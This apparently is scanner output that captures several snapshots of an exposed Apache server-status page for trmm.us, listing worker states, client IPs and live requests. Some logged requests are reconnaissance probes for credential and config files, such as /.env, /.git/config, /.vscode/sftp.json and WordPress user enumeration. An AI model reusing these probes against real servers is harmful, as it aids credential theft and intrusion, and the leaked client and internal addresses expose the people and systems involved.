Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-06270/284/47886_ 36.573100.04.881049.22 127.0.0.1http/1.1 0-06270/294/47789_ 36.7055180.09.791033.94 127.0.0.1http/1.1 0-06270/285/48076_ 36.58156750.07.671147.46 127.0.0.1http/1.1 0-06270/295/47974_ 36.75158170.012.021033.49 23.59.176.70http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-06270/290/47777_ 36.8011710.06.621091.32 78.128.113.142http/1.1lhsrwdz.com:443GET /wikindex.php?f=/NmRtJOUjAdutReQj/scRjKUhleBpzmTyO.txt HTTP 0-06270/305/48158_ 36.59143160.07.101141.03 157.90.181.149http/1.1 0-06270/304/48088_ 36.58160740.09.121060.07 127.0.0.1http/1.1 0-06270/300/47925_ 36.63136210.03.08915.10 127.0.0.1http/1.1 0-06270/294/48151_ 36.8298160.06.171150.31 23.59.176.71http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-06270/291/47969_ 36.9225140.06.111000.93 206.174.62.240http/1.1trmm.us:443POST /wallet/ajax-wallet.php HTTP/1.1 0-06270/292/47868_ 36.913120.08.981035.16 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 0-06270/292/47844_ 36.8936170.07.83998.79 72.93.152.110http/1.1trmm.us:443POST /wallet/ajax-wallet.php HTTP/1.1 0-06270/308/48016_ 36.8748150.07.051046.57 69.178.48.170http/1.1trmm.us:443POST /wallet/ajax-wallet.php HTTP/1.1 0-06270/304/47851_ 36.8562750.06.271080.97 165.254.96.10http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-06270/304/48001_ 36.81107740.08.78992.07 165.254.96.15http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-06270/308/48062_ 36.865520.02.241124.43 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 0-06270/296/48065_ 36.847300.010.281025.11 78.128.113.142http/1.1lhsrwdz.com:80GET /radio.php HTTP/1.1 0-06270/307/47901_ 36.95310.06.071035.49 64.227.126.135http/1.1trmm.us:443GET /debug/default/view?panel=config HTTP/1.1 1-0807090/703/45416_ 146.5230770.025.851033.33 23.201.57.165http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0807090/714/45289_ 146.55600.033.461017.73 165.232.76.155http/1.1trmm.us:80GET /.vscode/sftp.json HTTP/1.1 1-0807090/694/45338_ 146.514700.016.20986.04 78.128.113.142http/1.1lhsrwdz.com:80GET /lock360.php?daksldlkdsadas=1 HTTP/1.1 1-0807090/703/45316_ 146.41129140.025.161058.29 104.28.48.229http/1.1trmm.us:443POST /wallet/ajax-wallet.php HTTP/1.1 1-0807090/707/45344_ 146.3023600.024.201065.42 127.0.0.1http/1.1localhost:443GET /dynatraceApacheQueuingTimeCheck?timestamp=30234401910172 H 1-0807090/710/45146_ 146.0559790.025.061075.67 174.215.19.190http/1.1 1-0807090/694/45252_ 146.55610.020.651020.04 165.232.76.155http/1.1trmm.us:80GET /?rest_route=/wp/v2/users/ HTTP/1.1 1-0807090/698/45048_ 146.4312349170.020.891018.02 104.28.48.229http/1.1trmm.us:443POST /s/ HTTP/1.1 1-0807090/701/45228_ 146.572690.021.80967.70 96.7.74.175http/1.1crm.sprout.online:443GET /login.php HTTP/1.1 1-0807090/700/45263_ 146.55600.011.391143.14 165.232.76.155http/1.1localhost:80HELP 1-0807090/687/45389_ 146.4690780.07.881047.28 23.205.108.69http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0807090/710/45252_ 145.59236160.019.951037.21 127.0.0.1http/1.1 1-0807090/699/45213_ 146.5138720.022.241022.53 23.59.176.70http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0807090/702/45190_ 146.55500.09.741043.34 165.232.76.155http/1.1trmm.us:80GET /v2/_catalog HTTP/1.1 1-0807090/687/45196_ 146.4961117720.024.861070.45 174.215.19.190http/1.1trmm.us:443POST /s/ HTTP/1.1 1-0807090/680/45270_ 146.31228150.028.81943.67 23.59.176.71http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0807090/696/45265_ 146.332081680.018.901032.63 23.59.176.70http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0807090/691/45188_ 146.56300.020.631082.37 64.227.126.135http/1.1trmm.us:443GET /login.action HTTP/1.1 2-0736160/567/44110_ 106.591001040.05.79945.74 73.8.249.76http/1.1trmm.us:443POST /wallet/ajax-wallet.php HTTP/1.1 2-0736160/557/44120_ 106.5019630.013.051001.92 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 2-0736160/557/44275_ 106.6819167280.07.051074.92 72.217.25.166http/1.1trmm.us:443POST /s/ HTTP/1.1 2-0736160/559/43956_ 106.401600.011.721001.68 127.0.0.1http/1.1 2-0736160/552/44183_ 106.71500.014.56945.62 96.7.74.175http/1.1trmm.us:443GET /.vscode/sftp.json HTTP/1.1 2-0736160/549/44189_ 106.6364720.014.531012.19 23.77.218.214http/1.1crm.sprout.online:443GET /login.php HTTP/1.1 2-0736160/574/44212_ 106.6188560.011.41982.81 23.59.176.71http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0736160/554/43909_ 106.6733810.07.41909.02 23.59.176.71http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0736160/555/44098_ 106.23196700.015.59939.38 127.0.0.1http/1.1 2-0736160/551/43944_ 106.71500.07.22947.17 96.7.74.175http/1.1trmm.us:443GET /login.action HTTP/1.1 2-0736160/549/44181_ 106.71500.014.951005.45 96.7.74.175http/1.1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31ff87c597ff87c597e039172a
Apache Status Apache Server Status for www.trmm.us (via 172.31.38.193) Server Version: Apache/2.4.25 (Unix) OpenSSL/1.0.2j Server MPM: event Server Built: Dec 21 2016 11:30:10 Current Time: Friday, 24-Mar-2023 15:50:25 UTC Restart Time: Tuesday, 31-Jan-2023 18:12:59 UTC Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 51 days 21 hours 37 minutes 26 seconds Server load: 0.24 0.20 0.23 Total accesses: 8186396 - Total Traffic: 207.0 GB CPU Usage: u1337.95 s208.81 cu0 cs0 - .0345% CPU load 1.83 requests/sec - 48.4 kB/second - 26.5 kB/request 18 requests currently being processed, 180 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 098730no14yes4140120 123840no4yes315001 286508no3yes216010 3109764no3yes117030 4116801no3yes117020 533086no1yes117000 621767no9yes414060 7125209no1yes117010 8115169no0yes018000 943856no0yes018000 10129613no3yes117011 Sum11041 181800262 ____W_____WW___R___W______R________W_R______R___________________ _______W______W__________________W____________R_WW___R__________ W_______________________________________________________________ _W____.......................................................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-0987300/214/40350_ 18.06000.03.70868.71 96.7.74.175http/1.1localhost:80GET /.env HTTP/1.1 0-0987300/251/40345_ 18.070340.03.90867.81 96.7.74.175http/1.1localhost:80GET /info.php HTTP/1.1 0-0987300/264/40560_ 18.08000.02.13988.52 96.7.74.198http/1.1trmm.us:80GET /.vscode/sftp.json HTTP/1.1 0-0987300/227/40523_ 18.05000.01.22854.96 96.7.74.175http/1.1localhost:80GET /api/search?folderIds=0 HTTP/1.1 0-0987300/230/40329_ 18.07000.01.15924.78 96.7.74.175http/1.1trmm.us:80GET /debug/default/view?panel=config HTTP/1.1 0-0987300/249/40611_ 18.050150.04.53963.22 23.223.149.166http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-0987300/249/40600_ 18.050190.04.04887.13 23.220.96.151http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-0987300/253/40506_ 18.06000.01.44781.02 96.7.74.175http/1.1localhost:80GET /.DS_Store HTTP/1.1 0-0987300/242/40609_ 18.05000.03.97985.88 96.7.74.175http/1.1localhost:80GET /about HTTP/1.1 0-0987300/226/40499_ 18.06000.01.25830.93 96.7.74.198http/1.1localhost:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-0987300/243/40326W 17.111900.01.78862.20 173.218.126.144http/1.1trmm.us:443POST /s/ HTTP/1.1 0-0987300/224/40301_ 18.08010.01.14835.99 96.7.74.175http/1.1trmm.us:80GET / HTTP/1.1 0-0987300/220/40508_ 18.05000.01.56867.49 96.7.74.175http/1.1localhost:80GET / HTTP/1.1 0-0987300/242/40378_ 18.06000.01.45907.12 96.7.74.198http/1.1localhost:80GET /.vscode/sftp.json HTTP/1.1 0-0987300/232/40494_ 18.05000.01.16854.63 96.7.74.175http/1.1localhost:80GET /v2/_catalog HTTP/1.1 0-0987300/230/40502_ 18.08000.03.98940.84 96.7.74.175http/1.1trmm.us:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-0987300/237/40616_ 18.06000.04.06843.94 96.7.74.175http/1.1localhost:80GET /debug/default/view?panel=config HTTP/1.1 0-0987300/216/40453_ 18.05000.04.03869.38 96.7.74.198http/1.1localhost:80GET /config.json HTTP/1.1 1-0238400/573/38292_ 101.89400.011.38900.78 96.7.74.175http/1.1 1-0238400/568/38079W 101.61100.07.84873.27 174.240.149.27http/1.1trmm.us:443POST /s/ HTTP/1.1 1-0238400/556/38211_ 101.85400.06.69830.09 96.7.74.198http/1.1 1-0238400/555/38140_ 101.835120.08.98911.73 96.7.74.198http/1.1 1-0238400/560/38206_ 101.54520.011.57932.12 96.7.74.175http/1.1 1-0238400/559/38023_ 102.003160.07.38887.80 23.220.96.165http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0238400/561/38116_ 101.58500.014.07862.88 96.7.74.198http/1.1 1-0238400/554/37985_ 101.624850.09.89870.97 96.7.74.175http/1.1 1-0238400/556/38061R 101.55514710.014.24839.78 174.240.149.27http/1.1veew.info:443 1-0238400/555/38086_ 101.535280.013.251003.70 96.7.74.175http/1.1 1-0238400/555/38251_ 101.505120.04.23926.34 96.7.74.198http/1.1 1-0238400/575/38143_ 101.84500.031.07889.47 96.7.74.175http/1.1 1-0238400/561/38046_ 101.815140.09.68868.67 96.7.74.175http/1.1 1-0238400/564/38123_ 101.46510.09.13900.16 96.7.74.198http/1.1 1-0238400/563/38049_ 101.85500.09.13926.43 96.7.74.198http/1.1 1-0238400/566/38172_ 101.994210.010.31802.25 23.220.96.165http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0238400/548/38088_ 101.87500.010.46890.34 96.7.74.198http/1.1 1-0238400/559/38057W 101.462700.06.08925.07 76.170.153.107http/1.1trmm.us:443POST /s/ HTTP/1.1 2-0865080/185/38922_ 34.43500.06.42870.80 96.7.74.198http/1.1 2-0865080/186/38923R 34.29500.013.07881.75 174.240.149.27http/1.1 2-0865080/196/39006_ 34.56000.08.18943.61 96.7.74.198http/1.1localhost:80GET /login.action HTTP/1.1 2-0865080/185/38748_ 34.31500.07.62899.51 96.7.74.198http/1.1 2-0865080/198/38908_ 34.54010.07.15850.79 96.7.74.198http/1.1localhost:80GET /?rest_route=/wp/v2/users/ HTTP/1.1 2-0865080/190/38922_ 34.20510.01.46910.16 96.7.74.198http/1.1 2-0865080/196/38918_ 34.57000.05.34888.25 96.7.74.198http/1.1localhost:80GET /.git/config HTTP/1.1 2-0865080/192/38694_ 33.935180.011.97831.82 96.7.74.175http/1.1 2-0865080/193/38920R 33.645170.04.73823.40 195.211.77.140http/1.1client.simplismarter.com:443 2-0865080/188/38769_ 34.54000.07.15858.15 96.7.74.198http/1.1localhost:80GET /.git/config HTTP/1.1 2-0865080/196/38939_ 34.105150.06.96894.75 96.7.74.198http/1.1 2-0865080/194/38873_ 34.20510.04.42923.07 96.7.74.198http/1.1 2-0865080/186/38880_ 34.085269230.02.487031.41 96.7.74.198http/1.1 2-0
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31ff87c597ff87c5978bf6019f
Apache Status Apache Server Status for www.trmm.us (via 172.31.38.193) Server Version: Apache/2.4.25 (Unix) OpenSSL/1.0.2j Server MPM: event Server Built: Dec 21 2016 11:30:10 Current Time: Friday, 24-Mar-2023 15:50:25 UTC Restart Time: Tuesday, 31-Jan-2023 18:12:59 UTC Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 51 days 21 hours 37 minutes 26 seconds Server load: 0.24 0.20 0.23 Total accesses: 8186290 - Total Traffic: 207.0 GB CPU Usage: u1337.53 s208.75 cu0 cs0 - .0345% CPU load 1.83 requests/sec - 48.4 kB/second - 26.5 kB/request 14 requests currently being processed, 184 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 098730no6yes216040 123840no4yes315001 286508no2yes216000 3109764no0yes018000 4116801no2yes117000 533086no1yes117000 621767no4yes414010 7125209no0yes018000 8115169no0yes018000 943856no0yes018000 10129613no2yes117010 Sum11021 14184061 ________W_W________W______R________W_R______R___________________ ______________W__________________W____________R_WW___R__________ ________________________________________________________________ _W____.......................................................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-0987300/211/40347_ 17.93000.03.69868.70 96.7.74.175http/1.1localhost:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-0987300/248/40342_ 17.93000.03.87867.78 96.7.74.198http/1.1localhost:80GET /debug/default/view?panel=config HTTP/1.1 0-0987300/260/40556_ 17.92200.02.13988.51 96.7.74.198http/1.1crm.textripple.com:443GET /scss/.DS_Store HTTP/1.1 0-0987300/224/40520_ 17.92200.01.22854.96 96.7.74.175http/1.1crm.sprout.online:443GET /info.php HTTP/1.1 0-0987300/227/40326_ 17.93000.01.14924.77 96.7.74.198http/1.1localhost:80GET /telescope/requests HTTP/1.1 0-0987300/246/40608_ 17.92200.04.53963.21 96.7.74.175http/1.1crm.textripple.com:443GET /videos/.DS_Store HTTP/1.1 0-0987300/246/40597_ 17.92200.04.03887.13 96.7.74.175http/1.1crm.textripple.com:443GET /videos/.DS_Store HTTP/1.1 0-0987300/250/40503_ 17.93000.01.43781.01 96.7.74.175http/1.1localhost:80GET /?rest_route=/wp/v2/users/ HTTP/1.1 0-0987300/239/40606W 17.91000.03.94985.86 96.7.74.175http/1.1trmm.us:80GET /server-status HTTP/1.1 0-0987300/223/40496_ 17.92000.01.25830.92 96.7.74.198http/1.1localhost:80GET /telescope/requests HTTP/1.1 0-0987300/243/40326W 17.111800.01.78862.20 173.218.126.144http/1.1trmm.us:443POST /s/ HTTP/1.1 0-0987300/221/40298_ 17.92200.01.11835.96 96.7.74.198http/1.1crm.textripple.com:443GET /tmp/.DS_Store HTTP/1.1 0-0987300/217/40505_ 17.922810.01.55867.49 23.223.149.133http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-0987300/239/40375_ 17.93000.01.45907.11 96.7.74.175http/1.1localhost:80GET /?rest_route=/wp/v2/users/ HTTP/1.1 0-0987300/229/40491_ 17.92200.01.16854.63 96.7.74.175http/1.1crm.textripple.com:443GET /test/.DS_Store HTTP/1.1 0-0987300/227/40499_ 17.91200.03.95940.81 96.7.74.198http/1.1crm.textripple.com:443GET /tmp/.DS_Store HTTP/1.1 0-0987300/234/40613_ 17.93000.04.05843.94 96.7.74.198http/1.1localhost:80GET /.env HTTP/1.1 0-0987300/213/40450_ 17.91200.04.02869.37 96.7.74.175http/1.1crm.textripple.com:443GET /pdfs/.DS_Store HTTP/1.1 1-0238400/573/38292_ 101.89400.011.38900.78 96.7.74.175http/1.1 1-0238400/568/38079W 101.61100.07.84873.27 174.240.149.27http/1.1trmm.us:443POST /s/ HTTP/1.1 1-0238400/556/38211_ 101.85400.06.69830.09 96.7.74.198http/1.1 1-0238400/555/38140_ 101.834120.08.98911.73 96.7.74.198http/1.1 1-0238400/560/38206_ 101.54420.011.57932.12 96.7.74.175http/1.1 1-0238400/559/38023_ 102.002160.07.38887.80 23.220.96.165http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0238400/561/38116_ 101.58400.014.07862.88 96.7.74.198http/1.1 1-0238400/554/37985_ 101.624850.09.89870.97 96.7.74.175http/1.1 1-0238400/556/38061R 101.55514710.014.24839.78 174.240.149.27http/1.1veew.info:443 1-0238400/555/38086_ 101.534280.013.251003.70 96.7.74.175http/1.1 1-0238400/555/38251_ 101.504120.04.23926.34 96.7.74.198http/1.1 1-0238400/575/38143_ 101.84400.031.07889.47 96.7.74.175http/1.1 1-0238400/561/38046_ 101.814140.09.68868.67 96.7.74.175http/1.1 1-0238400/564/38123_ 101.46410.09.13900.16 96.7.74.198http/1.1 1-0238400/563/38049_ 101.85400.09.13926.43 96.7.74.198http/1.1 1-0238400/566/38172_ 101.993210.010.31802.25 23.220.96.165http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0238400/548/38088_ 101.87400.010.46890.34 96.7.74.198http/1.1 1-0238400/559/38057W 101.462700.06.08925.07 76.170.153.107http/1.1trmm.us:443POST /s/ HTTP/1.1 2-0865080/185/38922_ 34.43400.06.42870.80 96.7.74.198http/1.1 2-0865080/186/38923R 34.29500.013.07881.75 174.240.149.27http/1.1 2-0865080/195/39005_ 34.404110.08.18943.61 96.7.74.175http/1.1 2-0865080/185/38748_ 34.31400.07.62899.51 96.7.74.198http/1.1 2-0865080/197/38907_ 34.144190.07.15850.79 96.7.74.175http/1.1 2-0865080/190/38922_ 34.20410.01.46910.16 96.7.74.198http/1.1 2-0865080/195/38917_ 33.814140.05.33888.25 96.7.74.175http/1.1 2-0865080/192/38694_ 33.934180.011.97831.82 96.7.74.175http/1.1 2-0865080/193/38920R 33.644170.04.73823.40 195.211.77.140http/1.1client.simplismarter.com:443 2-0865080/187/38768_ 34.164140.07.15858.15 96.7.74.198http/1.1 2-0865080/196/38939_ 34.104150.06.96894.75 96.7.74.198http/1.1 2-0865080/194/38873_ 34.20410.04.42923.07 96.7.74.198http/1.1 2-0865080/186/38880_ 34.084269230.02.487031.41 96.7.74.198http/1.1 2-0865080/193/38858_ 33.8640
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31ff87c597ff87c597e6adbe42
Apache Status Apache Server Status for www.trmm.us (via 172.31.38.193) Server Version: Apache/2.4.25 (Unix) OpenSSL/1.0.2j Server MPM: event Server Built: Dec 21 2016 11:30:10 Current Time: Sunday, 19-Mar-2023 18:43:56 UTC Restart Time: Tuesday, 31-Jan-2023 18:12:59 UTC Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 47 days 30 minutes 57 seconds Server load: 0.26 0.23 0.27 Total accesses: 7387981 - Total Traffic: 193.1 GB CPU Usage: u1316.25 s224.26 cu0 cs0 - .0379% CPU load 1.82 requests/sec - 49.8 kB/second - 27.4 kB/request 5 requests currently being processed, 175 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 094294no0yes018000 133238no0yes117000 244513no1yes018000 324544no0yes018000 484393no0yes018000 514674no1yes018010 689957no0yes018000 895856no1yes117010 979743no1yes216000 1051878no1yes117010 Sum1005 5175030 ________________________________W_______________________________ ______________________________________________________________.. ................__________W__________W_______R_____________R____ ______.......................................................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-0942940/393/37092_ 70.941421090.06.76797.84 23.220.96.183http/1.1trmm.us:443GET /public/mms/20230310_204239_UTC_defa34a6db_0.PNG HTTP/1.1 0-0942940/385/37029_ 70.9810520.08.50798.15 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 0-0942940/375/37236_ 70.87192140.07.57928.34 96.7.74.175http/1.1crm.sprout.online:443GET /login.php HTTP/1.1 0-0942940/391/37228_ 70.8026070.09.38807.02 23.192.164.7http/1.1trmm.us:443GET /m/images/be36db0dba-1658521067042-20220722161755.jpg HTTP/ 0-0942940/398/37063_ 71.0640790.013.18851.26 23.205.108.69http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-0942940/390/37293_ 70.84227160.011.13900.82 96.7.74.198http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-0942940/380/37261_ 70.95125200.05.61834.69 23.205.108.69http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-0942940/388/37223_ 70.85212140.06.27735.12 165.254.96.20http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-0942940/394/37271_ 70.54105170.06.83923.96 127.0.0.1http/1.1 0-0942940/385/37210_ 71.11500.05.45779.60 143.110.218.229http/1.1trmm.us:443GET /about HTTP/1.1 0-0942940/368/37034_ 71.11500.020.65807.42 143.110.218.229http/1.1trmm.us:443GET / HTTP/1.1 0-0942940/392/36997_ 70.5649160.03.99779.30 127.0.0.1http/1.1 0-0942940/375/37201_ 71.11500.09.90799.94 104.248.140.11http/1.1trmm.us:80GET /about HTTP/1.1 0-0942940/397/37091_ 71.11500.011.12842.59 143.110.218.229http/1.1trmm.us:443GET /.env HTTP/1.1 0-0942940/394/37169_ 70.98107107440.04.80795.02 71.218.187.54http/1.1trmm.us:443POST /s/ HTTP/1.1 0-0942940/384/37222_ 71.054566860.010.20829.78 76.168.201.207http/1.1trmm.us:443POST /s/ HTTP/1.1 0-0942940/393/37352_ 71.0449140.05.42797.46 96.7.74.175http/1.1crm.sprout.online:443GET /login.php HTTP/1.1 0-0942940/383/37178_ 70.668170.012.09822.90 127.0.0.1http/1.1 1-0332380/658/33272_ 197.2912190.011.60816.73 23.35.71.87http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0332380/651/33043_ 196.9631200.09.69788.57 135.125.246.110http/1.1localhost:80POST / HTTP/1.1 1-0332380/642/33169_ 196.521301220.012.66760.20 127.0.0.1http/1.1 1-0332380/641/33160_ 196.6431200.010.75799.49 135.125.246.110http/1.1 1-0332380/642/33176_ 196.95320150.017.38826.54 23.205.108.69http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0332380/628/33037_ 197.32500.014.79803.01 96.7.74.198http/1.1trmm.us:443GET /debug/default/view?panel=config HTTP/1.1 1-0332380/644/33107_ 197.1215700.014.26778.13 127.0.0.1http/1.1localhost:443GET /dynatraceApacheQueuingTimeCheck?timestamp=29026653309894 H 1-0332380/624/32995_ 197.0621320.014.29774.58 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 1-0332380/642/33061_ 196.721571380.07.54729.36 127.0.0.1http/1.1 1-0332380/631/33107_ 197.1810821130.025.37893.58 174.84.123.196http/1.1trmm.us:443POST /s/ HTTP/1.1 1-0332380/661/33242_ 197.32500.015.23832.85 104.248.140.11http/1.1trmm.us:80GET /config.json HTTP/1.1 1-0332380/670/33080_ 197.15125270.024.70791.66 96.7.74.175http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0332380/643/32999_ 197.15130120.08.88777.40 96.7.74.175http/1.1crm.sprout.online:443GET /login.php HTTP/1.1 1-0332380/620/33091_ 196.95325140.016.47810.37 23.220.96.151http/1.1crm.sprout.online:443GET /login.php HTTP/1.1 1-0332380/638/33041_ 197.32000.016.25856.57 96.7.74.175http/1.1trmm.us:80GET /.git/config HTTP/1.1 1-0332380/647/33145_ 197.2095770.012.33732.34 165.254.96.20http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0332380/652/33053_ 196.67213750.010.71792.55 127.0.0.1http/1.1 1-0332380/657/33058_ 196.8839150.06.87852.83 127.0.0.1http/1.1 2-0445130/387/34892_ 63.61000.07.38796.64 96.7.74.198http/1.1trmm.us:80GET /.env HTTP/1.1 2-0445130/385/34983_ 63.4693160.05.02813.19 96.7.74.198http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0445130/400/35014_ 63.60500.08.96879.04 143.110.218.229http/1.1trmm.us:443GET /api/search?folderIds=0 HTTP/1.1 2-0445130/386/34788_ 63.59500.08.12829.90 104.248.140.11http/1.1trmm.us:80GET /s/135323e2831313e2630323e24333/_/;/META-INF/maven/com.atla 2-0445130/381/34870_ 63.5250720.07.45795.33 23.205.108.69http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0445130/397/34964_ 63.61010.06.37843.09 96.7.74.198http/1.1trmm.us:80GET / HTTP/1.1 2-0445130/385/34938_ 63.59500.03.55800.93 104.248.140.11http/1.1trmm.us:80GET /v2/_catalog HTTP/1.1 2-0445130/380/34720_ 63.5430160.011.32764.38 23.205.108.69http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0445130/384/34961_ 63.5610800.011.64754.56 23.205.108.69http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0445130/387/34778_ 63.61000.09.30803.86 96.7.74.198http/1.1trmm.us:80GET /.DS_Store HTTP/1.1 2-0445130/367/34965_ 63.16520.02.11824.78 143.110.218.229
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31ff87c597ff87c5971212bc5c
Apache Status Apache Server Status for www.trmm.us (via 172.31.38.193) Server Version: Apache/2.4.25 (Unix) OpenSSL/1.0.2j Server MPM: event Server Built: Dec 21 2016 11:30:10 Current Time: Sunday, 19-Mar-2023 18:43:56 UTC Restart Time: Tuesday, 31-Jan-2023 18:12:59 UTC Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 47 days 30 minutes 57 seconds Server load: 0.26 0.23 0.27 Total accesses: 7387990 - Total Traffic: 193.1 GB CPU Usage: u1316.26 s224.26 cu0 cs0 - .0379% CPU load 1.82 requests/sec - 49.8 kB/second - 27.4 kB/request 5 requests currently being processed, 175 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 094294no0yes018000 133238no0yes018000 244513no1yes018000 324544no0yes018000 484393no0yes117000 514674no1yes018010 689957no0yes018000 895856no1yes117010 979743no1yes315000 1051878no1yes018010 Sum1005 5175030 ________________________________________________________________ ___________W__________________________________________________.. ................_____________W_______W__W____R__________________ ______.......................................................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-0942940/393/37092_ 70.941421090.06.76797.84 23.220.96.183http/1.1trmm.us:443GET /public/mms/20230310_204239_UTC_defa34a6db_0.PNG HTTP/1.1 0-0942940/385/37029_ 70.9810520.08.50798.15 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 0-0942940/375/37236_ 70.87192140.07.57928.34 96.7.74.175http/1.1crm.sprout.online:443GET /login.php HTTP/1.1 0-0942940/391/37228_ 70.8026070.09.38807.02 23.192.164.7http/1.1trmm.us:443GET /m/images/be36db0dba-1658521067042-20220722161755.jpg HTTP/ 0-0942940/398/37063_ 71.0640790.013.18851.26 23.205.108.69http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-0942940/390/37293_ 70.84227160.011.13900.82 96.7.74.198http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-0942940/380/37261_ 70.95125200.05.61834.69 23.205.108.69http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-0942940/388/37223_ 70.85212140.06.27735.12 165.254.96.20http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-0942940/394/37271_ 70.54105170.06.83923.96 127.0.0.1http/1.1 0-0942940/385/37210_ 71.11500.05.45779.60 143.110.218.229http/1.1trmm.us:443GET /about HTTP/1.1 0-0942940/368/37034_ 71.11500.020.65807.42 143.110.218.229http/1.1trmm.us:443GET / HTTP/1.1 0-0942940/392/36997_ 70.5649160.03.99779.30 127.0.0.1http/1.1 0-0942940/375/37201_ 71.11500.09.90799.94 104.248.140.11http/1.1trmm.us:80GET /about HTTP/1.1 0-0942940/397/37091_ 71.11500.011.12842.59 